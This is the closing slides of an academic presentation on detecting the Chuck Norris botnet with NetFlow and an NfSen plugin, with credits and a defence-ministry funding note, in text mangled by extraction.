ExperienceNetFlow can monitor all such devices in networkDiscovery of new Chuck Norris botnet using NetFlowDeveloped a specialized NfSen plugin for Chuck Norrisbotnet detection
FutureChuck Norris is down but others are coming (eg Stuxnet)We are open to research collaborationDetection plugin is available at our project site
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 27 28
Thank You For Your Attention
Vojtěch KrmiacutečekTomaacuteš Plesniacutekvojtec|plesnikicsmunicz
Project CYBERhttpwwwmuniczicscyber
Detecting Botnetswith NetFlow
This material is based upon work supported by theCzech Ministry of Defence under Contract No OVMASUN200801